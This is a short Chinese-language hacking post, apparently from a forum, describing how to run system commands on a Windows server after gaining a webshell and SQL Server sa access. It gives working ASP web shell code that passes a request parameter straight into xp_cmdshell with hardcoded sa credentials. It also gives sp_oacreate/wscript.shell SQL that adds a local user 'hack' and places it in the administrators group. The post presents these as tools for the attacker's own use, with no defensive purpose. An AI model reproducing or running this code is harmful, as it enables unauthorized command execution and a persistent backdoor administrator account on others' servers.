方法一：

获得一个 webshell 以及一个机器的 sql server的sa权限后，在 机器不开通 Sql远程登陆的情况下，我就会用这段代码，来实现本地执行我需要执行的dos命令。
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－


<%

    actionstr=request("action")
    uid=sa
    pwd=sa
    db="master"


    if actionstr<>"" then

    dim conn
  dim connstr
  Set conn = Server.CreateObject("ADODB.Connection")
  connstr="Driver={SQL Server};server=(local);uid="&uid&";pwd="&pwd&";database="&db&";"
  conn.Open connstr


    sql="master.dbo.xp_cmdshell '"&actionstr&"'"
    conn.execute(sql)
   
 


    conn.close
    set conn=nothing
    end if
  %>

方法二：

这个是直接在查询分析器中执行，利用wscript来实现，就是 当xp_cmdshell 被系统管理员删除了的情况下，可以使用这招！

declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'

--------------------------增加权限---------------------------------------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'